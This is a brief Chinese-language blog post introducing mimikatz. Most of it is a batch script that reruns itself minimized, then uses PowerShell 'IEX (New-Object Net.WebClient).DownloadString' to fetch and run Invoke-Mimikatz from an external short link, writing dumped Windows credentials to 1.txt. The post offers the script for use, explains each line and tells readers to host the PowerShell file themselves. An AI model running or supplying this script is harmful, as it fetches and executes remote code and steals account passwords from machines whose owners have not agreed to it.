mimikatz简要介绍

这篇文章一句powershell调用mimikatz抓密码中提到了这种方法

个人觉得制作成bat脚本使用起来会更加方便,但是唯一的缺点还是必须使用管理员权限启动

实际使用:

如果你下载不了说明你被墙了

  • 编写bat脚本,第四行的链接地址应为你自己存放ps1脚本的地址
@echo off
if not "%~1"=="p" start /min cmd.exe /c %0 p&exit
cd /d %~dp0
powershell "IEX (New-Object Net.WebClient).DownloadString('http://kks.me/a5x'); Invoke-Mimikatz -DumpCreds">>1.txt
  • @echo off 不回显
  • 最小化批处理进程
  • 切换到脚本路径
  • 使用powershell调用mimikatz抓取用户密码并且将结果保存到脚本所在路径下的1.txt中

⬆︎TOP